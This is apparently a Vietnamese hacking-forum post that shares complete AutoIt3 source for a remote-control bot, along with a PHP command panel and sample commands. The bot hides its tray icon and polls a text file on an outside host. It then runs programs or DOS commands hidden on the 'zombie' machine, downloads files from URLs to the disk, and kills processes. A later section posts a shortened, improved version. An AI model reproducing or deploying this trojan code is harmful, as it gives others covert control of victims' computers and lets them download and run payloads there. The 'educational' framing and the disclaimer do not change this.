Như đã nói, bot này Jutoms viết ra với mục đích để các bạn hiểu cấu trúc của một con bot như thế nào sau cái video sử dụng bot của LlyKil.

Đặc điểm:
1. Không tự động sửa đổi hệ thống
2. Không có tính lây lan như virus
3. Nhận lệnh từ file txt đặt trên site chỉ định (thay vì thông qua IRC)
4. Từ điều 3 => có thể cho/không cho một số zombie có thể nhận chỉ thị từ Master.

Tính năng:
1. Thực thi các ứng dụng trên máy zombie ở chế độ background (ẩn) hoặc forceground (hiện).
2. Chỉ thị từ Master được gõ như trong Windows Console (CMD)
3. Có khả năng download file từ URL chỉ định tư về nơi chỉ định trên đĩa cứng
4. Stop/Kill ứng dụng bằng tên.

Đây là mã nguồn bằng AutoIT3
Anh em có thể test rồi viết hộ mình hướng dẫn sử dụng cấu trúc lệnh và cơ chế của nó nhé ! (IMG:http://xforce.enhack.net/images/smilies/yahoo/6.gif)

QUOTE

#NoTrayIcon
$txt = "http://enhack.net/direc.txt"

While (1)
GetDr()
ExCmd()
Sleep(3000)
WEnd

Func GetDr()
; Doc va phan tich chi thi
InetGet ($txt, @WindowsDir & "\direc.txt", 1, 0)
$fp = FileOpen(@WindowsDir & "\direc.txt", 0)
Global $con = FileReadLine($fp)
FileClose($fp)
FileDelete(@WindowsDir & "\direc.txt")
EndFunc

Func ExCmd()
; Phan tich va thuc hien lenh
If StringInStr($con, "RUN#", 2) Then
$cmd = StringSplit($con, "#")
If StringInStr($con, "#SHOW", 2) Then
Run($cmd[2])
Else
Run($cmd[2], "", @SW_HIDE)
EndIf
Sleep(7000)
ElseIf StringInStr($con, "LOAD#", 2) Then
$cmd = StringSplit($con, " ")
InetGet ($cmd[2], $cmd[3], 0, 1)
Sleep(7000)
ElseIf StringInStr($con, "KILL#", 2) Then
$cmd = StringSplit($con, "#")
Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
Sleep(7000)
EndIf
EndFunc 

Và cái này quan trọng nè :

Jutoms và EHS không chịu bất kì trách nhiệm nào nếu các bạn sử dụng mã nguồn bot trên với bất kì mục đích phá hoại nào.
Đây là mã nguồn file cmd.php để gõ command cho Bot

HTML

<html>
<head>
<title>EBoT Commander</title>
</head>
<body style='color:#00FF00; background-color: black'>
<br>
<form action=# method=POST>
<input type=text name=cmd size=80>
<input type=submit value=Command>
</form>
<br>
</body>
</html>
<?php$cmd = $_POST['cmd'];
$fp = fopen('direc.txt', 'w');
fwrite($fp, $cmd);
fclose($fp);
echo $cmd;
?>

Một số lệnh mẫu (không phân biệt chữ hoa/thường)
Chú ý: sau khi gõ một lệnh và enter, chờ khoảng 10s sau bấm enter lần nữa để xóa lệnh, không thì bot cứ thế mà làm sẽ ì máy zombie

Mở Registry Editor chế độ hiện, nếu chạy ẩn thì bỏ #show

QUOTE

RUN#regedit #show

Tắt một ứng dụng, vd như YahooMessenger

QUOTE

KILL#YahooMessenger

Download hxxp://enhack.net/avatar.png về C:\avatar.png

QUOTE

LOAD# hxxp://enhack.net/avatar.png c:\avatar.png



Bổ sung code mới, thông minh hơn con trên xíu (IMG:http://xforce.enhack.net/images/smilies/yahoo/1.gif)
Thiết kế cho việc dùng Cellfone có GPRS remote console nên tối giản mã lệnh và sẽ bổ sung những mã lệnh mới để thay thế những mã lệnh dài nếu cần thiết.

QUOTE

#include 
#include 
#NoTrayIcon

$txt = "http://enhack.net/direc.txt"
$key = ""

While (1)
$con = _INetGetSource($txt)
If $key <> $con Then
; Phan tich va thuc hien lenh
If StringInStr($con, "#", 2) Then
$cmd = StringSplit($con, "#")
If StringInStr($con, "@#", 2) Then
Run($cmd[2], "", @SW_HIDE)
Else
Run($cmd[2])
EndIf
ElseIf StringInStr($con, "$", 2) Then
$cmd = StringSplit($con, "$")
_RunDOS($cmd[2])
ElseIf StringInStr($con, "!", 2) Then
$cmd = StringSplit($con, " ")
InetGet ($cmd[2], $cmd[3], 0, 1)
ElseIf StringInStr($con, "~", 2) Then
$cmd = StringSplit($con, "~")
Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
EndIf
$key = $con
EndIf
Sleep(5000)
WEnd

QUOTE

RUN# lão rút con "#",
LOAD# rút còn "!"
KILL# rút còn "~"
và run lệnh DOS thì "$"
và "@#" để chạy nền vì mặc định "#" là show